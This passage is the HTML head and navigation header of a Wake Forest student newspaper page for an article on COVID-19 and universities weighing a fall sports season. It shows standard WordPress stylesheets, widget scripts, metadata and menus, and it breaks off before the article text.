<!doctype html>
<html lang="en-US">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="profile" href="http://gmpg.org/xfn/11">

    <title>Major concerns loom as universities contemplate the risks and rewards of a fall sports season</title>
		<style type="text/css">
		</style>
		          <script>
            (function(d){
              var js, id = 'powr-js', ref = d.getElementsByTagName('script')[0];
              if (d.getElementById(id)) {return;}
              js = d.createElement('script'); js.id = id; js.async = true;
              js.src = '//www.powr.io/powr.js?external-type=wordpress';
              js.setAttribute('powr-token','fkXdNHxbt11538509749');
              ref.parentNode.insertBefore(js, ref);
            }(document));
          </script>
          			<style>
			.spoontalk-social
			{
			color: white !important;
			text-align: center !important;
			margin-bottom:px;
			border-radius:%;

		    background:;
	
			
	
			}
			
		
.alignment { text-align:; }
</style>
<link rel='dns-prefetch' href='//platform-api.sharethis.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//maxcdn.bootstrapcdn.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title=" &raquo; Feed" href="http://wfuogb.com/feed/" />
<link rel="alternate" type="application/rss+xml" title=" &raquo; Comments Feed" href="http://wfuogb.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title=" &raquo; Major concerns loom as universities contemplate the risks and rewards of a fall sports season Comments Feed" href="http://wfuogb.com/2020/07/major-concerns-loom-as-universities-contemplate-the-risks-and-rewards-of-a-fall-sports-season/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/wfuogb.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.4.2"}};
			/*! This file is auto-generated */
			!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<!-- managing ads with Advanced Ads – https://wpadvancedads.com/ --><script>
					advanced_ads_ready=function(){var fns=[],listener,doc=typeof document==="object"&&document,hack=doc&&doc.documentElement.doScroll,domContentLoaded="DOMContentLoaded",loaded=doc&&(hack?/^loaded|^c/:/^loaded|^i|^c/).test(doc.readyState);if(!loaded&&doc){listener=function(){doc.removeEventListener(domContentLoaded,listener);window.removeEventListener("load",listener);loaded=1;while(listener=fns.shift())listener()};doc.addEventListener(domContentLoaded,listener);window.addEventListener("load",listener)}return function(fn){loaded?setTimeout(fn,0):fns.push(fn)}}();
			</script><style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='mo_openid_admin_settings_style-css'  href='http://wfuogb.com/wp-content/plugins/miniorange-login-openid/includes/css/mo_openid_style.css?version=7.3.0&#038;ver=5.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='mo_openid_admin_settings_phone_style-css'  href='http://wfuogb.com/wp-content/plugins/miniorange-login-openid/includes/css/phone.css?ver=5.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='mo-wp-bootstrap-social-css'  href='http://wfuogb.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-social.css?ver=5.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='mo-wp-bootstrap-main-css'  href='http://wfuogb.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap.min-preview.css?ver=5.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='mo-openid-sl-wp-font-awesome-css'  href='http://wfuogb.com/wp-content/plugins/miniorange-login-openid/includes/css/mo-font-awesome.min.css?ver=5.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='bootstrap_style_ass-css'  href='http://wfuogb.com/wp-content/plugins/miniorange-login-openid/includes/css/mo_openid_bootstrap-tour-standalone.css?version=5.1.4&#038;ver=5.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='wp-block-library-css'  href='http://wfuogb.com/wp-includes/css/dist/block-library/style.min.css?ver=5.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='aps-animate-css-css'  href='http://wfuogb.com/wp-content/plugins/accesspress-social-icons/css/animate.css?ver=1.7.7' type='text/css' media='all' />
<link rel='stylesheet' id='aps-frontend-css-css'  href='http://wfuogb.com/wp-content/plugins/accesspress-social-icons/css/frontend.css?ver=1.7.7' type='text/css' media='all' />
<link rel='stylesheet' id='aptf-bxslider-css'  href='http://wfuogb.com/wp-content/plugins/accesspress-twitter-feed/css/jquery.bxslider.css?ver=1.6.2' type='text/css' media='all' />
<link rel='stylesheet' id='aptf-front-css-css'  href='http://wfuogb.com/wp-content/plugins/accesspress-twitter-feed/css/frontend.css?ver=1.6.2' type='text/css' media='all' />
<link rel='stylesheet' id='aptf-font-css-css'  href='http://wfuogb.com/wp-content/plugins/accesspress-twitter-feed/css/fonts.css?ver=1.6.2' type='text/css' media='all' />
<link rel='stylesheet' id='ctf_styles-css'  href='http://wfuogb.com/wp-content/plugins/custom-twitter-feeds/css/ctf-styles.min.css?ver=1.4.1' type='text/css' media='all' />
<link rel='stylesheet' id='fts-feeds-css'  href='http://wfuogb.com/wp-content/plugins/feed-them-social/feeds/css/styles.css?ver=2.8.2' type='text/css' media='' />
<link rel='stylesheet' id='jr-insta-styles-css'  href='http://wfuogb.com/wp-content/plugins/instagram-slider-widget/assets/css/jr-insta.css?ver=1.7.4' type='text/css' media='all' />
<link rel='stylesheet' id='menu-image-css'  href='http://wfuogb.com/wp-content/plugins/menu-image/includes/css/menu-image.css?ver=2.9.5' type='text/css' media='all' />
<link rel='stylesheet' id='css_for_fa_icon-css'  href='http://wfuogb.com/wp-content/plugins/spoontalk-social-media-icons-widget/inc/css/font-awesome-4.0.3/css/font-awesome.min.css?ver=5.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='css_for_hover_effect-css'  href='http://wfuogb.com/wp-content/plugins/spoontalk-social-media-icons-widget/inc/css/hover.css?ver=5.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='blappsta-style-front-css'  href='http://wfuogb.com/wp-content/plugins/yournewsapp/css/blappsta.css?ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='awpa-wp-post-author-style-css'  href='http://wfuogb.com/wp-content/plugins/wp-post-author//assets/css/awpa-frontend-style.css?ver=5.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='newstorial-google-fonts-css'  href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,300,400italic,700' type='text/css' media='all' />
<link rel='stylesheet' id='bootstrap-css'  href='http://wfuogb.com/wp-content/themes/magazine-7/assets/bootstrap/css/bootstrap.min.css?ver=5.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='magazine-7-style-css'  href='http://wfuogb.com/wp-content/themes/magazine-7/style.css?ver=5.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='newstorial-css'  href='http://wfuogb.com/wp-content/themes/newstorial/style.css?ver=1.0.0' type='text/css' media='all' />
<link rel='stylesheet' id='font-awesome-v5-css'  href='http://wfuogb.com/wp-content/themes/magazine-7/assets/font-awesome-v5/css/fontawesome-all.min.css?ver=5.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='slick-css'  href='http://wfuogb.com/wp-content/themes/magazine-7/assets/slick/css/slick.min.css?ver=5.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='sidr-css'  href='http://wfuogb.com/wp-content/themes/magazine-7/assets/sidr/css/jquery.sidr.dark.css?ver=5.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='magnific-popup-css'  href='http://wfuogb.com/wp-content/themes/magazine-7/assets/magnific-popup/magnific-popup.css?ver=5.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='magazine-7-google-fonts-css'  href='https://fonts.googleapis.com/css?family=Source%20Sans%20Pro:400,400i,700,700i|Montserrat:400,700&#038;subset=latin,latin-ext' type='text/css' media='all' />
<link rel='stylesheet' id='wis_font-awesome-css'  href='https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css?ver=5.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='wis_instag-slider-css'  href='http://wfuogb.com/wp-content/plugins/instagram-slider-widget/assets/css/instag-slider.css?ver=1.7.4' type='text/css' media='all' />
<link rel='stylesheet' id='wis_wis-header-css'  href='http://wfuogb.com/wp-content/plugins/instagram-slider-widget/assets/css/wis-header.css?ver=1.7.4' type='text/css' media='all' />
<link rel='stylesheet' id='wptt_front-css'  href='http://wfuogb.com/wp-content/plugins/wp-twitter-feeds/controller/../css/admin_style.min.css?ver=5.4.2' type='text/css' media='all' />
<link rel='stylesheet' id='wpdu-frontend-css-css'  href='http://wfuogb.com/wp-content/plugins/wp-display-users/assets/css/wpdu-frontend-css.css?ver=5.4.2' type='text/css' media='all' />
<script type='text/javascript' src='http://wfuogb.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp'></script>
<script type='text/javascript' src='http://wfuogb.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://wfuogb.com/wp-content/plugins/miniorange-login-openid/includes/js/jquery.cookie.min.js?ver=5.4.2'></script>
<script type='text/javascript' src='http://wfuogb.com/wp-content/plugins/miniorange-login-openid/includes/js/social_login.js?ver=5.4.2'></script>
<script type='text/javascript' src='http://wfuogb.com/wp-content/plugins/accesspress-social-icons/js/frontend.js?ver=1.7.7'></script>
<script type='text/javascript' src='http://wfuogb.com/wp-content/plugins/accesspress-twitter-feed/js/jquery.bxslider.min.js?ver=1.6.2'></script>
<script type='text/javascript' src='http://wfuogb.com/wp-content/plugins/accesspress-twitter-feed/js/frontend.js?ver=1.6.2'></script>
<script type='text/javascript' src='http://wfuogb.com/wp-content/plugins/feed-them-social/feeds/js/powered-by.js?ver=2.8.2'></script>
<script type='text/javascript' src='http://wfuogb.com/wp-content/plugins/feed-them-social/feeds/js/fts-global.js?ver=2.8.2'></script>
<script type='text/javascript' src='http://wfuogb.com/wp-content/plugins/instagram-slider-widget/assets/js/jquery.flexslider-min.js?ver=1.7.4'></script>
<script type='text/javascript' src='//platform-api.sharethis.com/js/sharethis.js#product=ga&#038;property=58e25e1483b6f0001198da18'></script>
<link rel='https://api.w.org/' href='http://wfuogb.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://wfuogb.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://wfuogb.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Old Gold &#038; Busy at Home: Sports and Activism with Ty Moore' href='http://wfuogb.com/2020/07/old-gold-busy-at-home-episode-2/' />
<link rel="canonical" href="http://wfuogb.com/2020/07/major-concerns-loom-as-universities-contemplate-the-risks-and-rewards-of-a-fall-sports-season/" />
<link rel='shortlink' href='http://wfuogb.com/?p=9567' />
<link rel="alternate" type="application/json+oembed" href="http://wfuogb.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwfuogb.com%2F2020%2F07%2Fmajor-concerns-loom-as-universities-contemplate-the-risks-and-rewards-of-a-fall-sports-season%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://wfuogb.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwfuogb.com%2F2020%2F07%2Fmajor-concerns-loom-as-universities-contemplate-the-risks-and-rewards-of-a-fall-sports-season%2F&#038;format=xml" />

            <!--/ Facebook Thumb Fixer Open Graph /-->
            <meta property="og:type" content="article" />
            <meta property="og:url" content="http://wfuogb.com/2020/07/major-concerns-loom-as-universities-contemplate-the-risks-and-rewards-of-a-fall-sports-season/" />
            <meta property="og:title" content="Major concerns loom as universities contemplate the risks and rewards of a fall sports season" />
            <meta property="og:description" content="As the realities of COVID-19 are forcing schools to reconfigure campus life, many roadblocks have arised in the path of NCAA programs hoping to begin sports seasons come fall" />
            <meta property="og:site_name" content="" />
            <meta property="og:image" content="http://wfuogb.com/wp-content/uploads/2020/07/bbt-field-empty.jpg" />

            <meta itemscope itemtype="article" />
            <meta itemprop="description" content="As the realities of COVID-19 are forcing schools to reconfigure campus life, many roadblocks have arised in the path of NCAA programs hoping to begin sports seasons come fall" />
            <meta itemprop="image" content="http://wfuogb.com/wp-content/uploads/2020/07/bbt-field-empty.jpg" />
            

<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style>
			<style>
			div.wpdu-user-container h3 {
				text-transform: uppercase;
				font-size: 25px;
			}
			div.wpdu-user-container h4 {
				font-size: 13px;
			}
			</style>
			        <style type="text/css">
                        .site-title a,
            .site-description {
                color: #000000;
            }

            .site-branding .site-title {
                font-size: 0px;
            }

            @media only screen and (max-width: 640px) {
                .site-branding .site-title {
                    font-size: 60px;

                }

            @media only screen and (max-width: 640px) {
                .site-branding .site-title {
                    font-size: 50px;

                }

            

        </style>
        <link rel="icon" href="http://wfuogb.com/wp-content/uploads/2017/02/cropped-AppLogo-150x150.jpg" sizes="32x32" />
<link rel="icon" href="http://wfuogb.com/wp-content/uploads/2017/02/cropped-AppLogo-300x300.jpg" sizes="192x192" />
<link rel="apple-touch-icon" href="http://wfuogb.com/wp-content/uploads/2017/02/cropped-AppLogo-300x300.jpg" />
<meta name="msapplication-TileImage" content="http://wfuogb.com/wp-content/uploads/2017/02/cropped-AppLogo-300x300.jpg" />
		<style type="text/css" id="wp-custom-css">
			.container {
    width: 85%;
}		</style>
		</head>

<body class="post-template-default single single-post postid-9567 single-format-standard wp-custom-logo full-width-content elementor-default">

    <div id="af-preloader">
        <div id="loader-wrapper">
            <div id="loader"></div>
        </div>
    </div>

<div id="page" class="site">
    <a class="skip-link screen-reader-text" href="#content">Skip to content</a>

<div class="magazine-7-woocommerce-store-notice">
    </div>
    <div class="top-masthead">

        <div class="container">
            <div class="row">
                                    <div class="col-xs-12 col-sm-12 col-md-8 device-center">
                                                    <span class="topbar-date">
                                        Sun. Jul 26th, 2020                                     </span>

                        
                                            </div>
                                                    <div class="col-xs-12 col-sm-12 col-md-4 pull-right">
                        <div class="social-navigation"><ul id="social-menu" class="menu"><li id="menu-item-8791" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8791"><a href="https://twitter.com/wfu_ogb" class="menu-image-title-after"><span class="screen-reader-text"><span class="menu-image-title-after menu-image-title">Twitter</span></span></a></li>
<li id="menu-item-8793" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8793"><a href="https://www.instagram.com/wfu_ogb/" class="menu-image-title-after"><span class="screen-reader-text"><span class="menu-image-title-after menu-image-title">Instagram</span></span></a></li>
<li id="menu-item-8792" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8792"><a href="https://www.facebook.com/OGB1916/" class="menu-image-title-after"><span class="screen-reader-text"><span class="menu-image-title-after menu-image-title">Facebook</span></span></a></li>
</ul></div>                    </div>
                            </div>
        </div>
    </div> <!--    Topbar Ends-->
<header id="masthead" class="site-header">
        <div class="masthead-banner " data-background="">
        <div class="container">
            <div class="row">
                <div class="col-md-12">
                    <div class="site-branding">
                        <a href="http://wfuogb.com/" class="custom-logo-link" rel="home"><img width="1191" height="225" src="http://wfuogb.com/wp-content/uploads/2020/01/cropped-imageedit_3_2391897339.png" class="custom-logo" alt="" srcset="http://wfuogb.com/wp-content/uploads/2020/01/cropped-imageedit_3_2391897339.png 1191w, http://wfuogb.com/wp-content/uploads/2020/01/cropped-imageedit_3_2391897339-300x57.png 300w, http://wfuogb.com/wp-content/uploads/2020/01/cropped-imageedit_3_2391897339-1024x193.png 1024w, http://wfuogb.com/wp-content/uploads/2020/01/cropped-imageedit_3_2391897339-768x145.png 768w" sizes="(max-width: 1191px) 100vw, 1191px" /></a>                            <p class="site-title font-family-1">
                                <a href="http://wfuogb.com/" rel="home"></a>
                            </p>
                        
                                                    <p class="site-description">Wake Forest&#039;s Student NewsPaper Since 1916</p>
                                            </div>
                </div>
            </div>
        </div>
    </div>
    <nav id="site-navigation" class="main-navigation">
        <div class="container">
            <div class="row">
                <div class="col-md-12">
                    <div class="navigation-container">
                        
                        <div class="cart-search">
                            
                            <span class="af-search-click icon-search">
                                    <i class="fa fa-search"></i>
                            </span>

                        </div>
                        <span class="toggle-menu" aria-controls="primary-menu" aria-expanded="false">
                                <span class="screen-reader-text">Primary Menu</span>
                                 <i class="ham"></i>
                            </span>

                        <div class="menu main-menu"><ul id="primary-menu" class="menu"><li id="menu-item-1755" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-1755"><a href="http://wfuogb.com/category/news/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">News</span></a>
<ul class="sub-menu">
	<li id="menu-item-9365" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9365"><a href="http://wfuogb.com/category/news/covid-19/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">COVID-19</span></a></li>
	<li id="menu-item-1731" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1731"><a href="http://wfuogb.com/category/news/campus-news/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Campus News</span></a></li>
	<li id="menu-item-1734" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1734"><a href="http://wfuogb.com/category/news/local-news/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Local News</span></a></li>
	<li id="menu-item-1738" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1738"><a href="http://wfuogb.com/category/news/national-news/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">National News</span></a></li>
	<li id="menu-item-5819" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5819"><a href="http://wfuogb.com/category/news/police-beat/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Police Beat</span></a></li>
	<li id="menu-item-9363" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9363"><a href="http://wfuogb.com/category/podcast/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Podcast</span></a></li>
	<li id="menu-item-9364" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9364"><a href="http://wfuogb.com/category/news/student-government-2020/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Student Government 2020</span></a></li>
</ul>
</li>
<li id="menu-item-1732" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-1732"><a href="http://wfuogb.com/category/sports/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Sports</span></a>
<ul class="sub-menu">
	<li id="menu-item-1740" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1740"><a href="http://wfuogb.com/category/sports/basketball/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Basketball</span></a></li>
	<li id="menu-item-1742" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1742"><a href="http://wfuogb.com/category/sports/football/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Football</span></a></li>
	<li id="menu-item-1743" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1743"><a href="http://wfuogb.com/category/sports/golf/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Golf</span></a></li>
	<li id="menu-item-1739" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1739"><a href="http://wfuogb.com/category/sports/baseball/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Baseball</span></a></li>
	<li id="menu-item-1744" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1744"><a href="http://wfuogb.com/category/sports/soccer/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Soccer</span></a></li>
	<li id="menu-item-1745" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1745"><a href="http://wfuogb.com/category/sports/tennis/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Tennis</span></a></li>
	<li id="menu-item-1761" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1761"><a href="http://wfuogb.com/category/sports/profiles-sports/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Profiles</span></a></li>
	<li id="menu-item-3838" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-3838"><a href="http://wfuogb.com/category/sports/e-sports/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">E-Sports</span></a></li>
</ul>
</li>
<li id="menu-item-1733" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-1733"><a href="http://wfuogb.com/category/opinion/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Opinion</span></a>
<ul class="sub-menu">
	<li id="menu-item-1751" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1751"><a href="http://wfuogb.com/category/opinion/columns/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Columns</span></a></li>
	<li id="menu-item-1752" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1752"><a href="http://wfuogb.com/category/opinion/editorials/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Editorials</span></a></li>
	<li id="menu-item-1753" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1753"><a href="http://wfuogb.com/category/opinion/letters-to-the-editor/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Letters to the Editor</span></a></li>
</ul>
</li>
<li id="menu-item-1735" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-1735"><a href="http://wfuogb.com/category/life/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Life</span></a>
<ul class="sub-menu">
	<li id="menu-item-9540" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9540"><a href="http://wfuogb.com/category/life/podcasts/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Podcasts</span></a></li>
	<li id="menu-item-1750" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1750"><a href="http://wfuogb.com/category/life/reviews/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Reviews</span></a></li>
	<li id="menu-item-9358" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9358"><a href="http://wfuogb.com/category/life/music/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Music</span></a></li>
	<li id="menu-item-1736" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1736"><a href="http://wfuogb.com/category/life/fashion/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Fashion</span></a></li>
	<li id="menu-item-9359" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9359"><a href="http://wfuogb.com/category/life/travel/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Travel</span></a></li>
	<li id="menu-item-9360" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9360"><a href="http://wfuogb.com/category/life/health/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Health</span></a></li>
	<li id="menu-item-9361" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9361"><a href="http://wfuogb.com/category/life/food/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Food</span></a></li>
	<li id="menu-item-9362" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9362"><a href="http://wfuogb.com/category/life/culture/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Culture</span></a></li>
	<li id="menu-item-1749" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-1749"><a href="http://wfuogb.com/category/life/humor/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Humor</span></a></li>
</ul>
</li>
<li id="menu-item-5876" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-5876"><a href="http://wfuogb.com/category/science-technology/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Science &#038; Technology</span></a></li>
<li id="menu-item-6139" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-6139"><a href="http://wfuogb.com/category/about-us/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">About Us</span></a>
<ul class="sub-menu">
	<li id="menu-item-8702" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8702"><a href="http://wfuogb.com/category/about-us/our-staff/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Our Staff</span></a></li>
	<li id="menu-item-6254" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6254"><a href="http://wfuogb.com/submissions-and-policies/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Submissions and Policies</span></a></li>
	<li id="menu-item-9197" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9197"><a href="http://wfuogb.com/advertise-with-us/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Advertise With Us</span></a></li>
</ul>
</li>
<li id="menu-item-9487" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9487"><a href="http://wfuogb.com/category/graduation-tabloid-2020/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Graduation Tabloid 2020</span></a></li>
<li id="menu-item-9495" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-9495"><a href="http://wfuogb.com/print-edition/" class="menu-image-title-after"><span class="menu-image-title-after menu-image-title">Print Edition</span></a></li>
</ul></div>



                    </div>
                </div>
            </div>
        </div>
    </nav>
</header>
<div id="af-search-wrap">
    <div class="af-search-box table-block">
        <div class="table-block-child v-center text-center">
            <form role="search" method="get" class="search-form" action="http://wfuogb.com/">
				<label>
					<span class="screen-reader-text">Search for:</span>
					<input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Search" />
			</form>        </div>
    </div>
    <div class="af-search-close af-search-click">
        <span></span>
        <span></span>
    </div>
</div>








    <div id="content" class="site-content">


        <div class="em-breadcrumbs font-family-1">
            <div class="container">
                <div class="row">
                    <div class="col-sm-12">
                        <div role="navigation" aria-label="Breadcrumbs" class="breadcrumb-trail breadcrumbs" itemprop="breadcrumb"><ul class="trail-items" itemscope itemtype="http://schema.org/BreadcrumbList"><meta name="numberOfItems" content="4" /><meta name="itemListOrder" content="Ascending" /><li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem" class="trail-item trail-begin"><a href="http://wfuogb.com/" rel="home" itemprop="item"><span itemprop="name">Home</span></a><meta itemprop="position" content="1" /></li><li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem" class="trail-item"><a href="http://wfuogb.com/2020/" itemprop="item"><span itemprop="name">2020</span></a><meta itemprop="position" content="2" /></li><li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem" class="trail-item"><a href="http://wfuogb.com/2020/07/" itemprop="item"><span itemprop="name">July</span></a><meta itemprop="position" content="3" /></li><li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem" class="trail-item trail-end"><span itemprop="item"><span itemprop="name">Major concerns loom as universities contemplate the risks and rewards of a fall sports season</span></span><meta itemprop="position" content="4" /></li></ul></div>                    </div>
                </div>
            </div>
        </div>


        <div class="container">
        <div class="row">
            <div class="col-sm-12">
                <div id="primary" class="content-area">
                    <main id="main" class="site-main">

                                                    <article id="post-9567" class="post-9567 post type-post status-publish format-standard has-post-thumbnail hentry category-sports">
                                <div class="entry-content-wrap">
                                    <header class="entry-header">
                    <div class="post-thumbnail full-width-image">
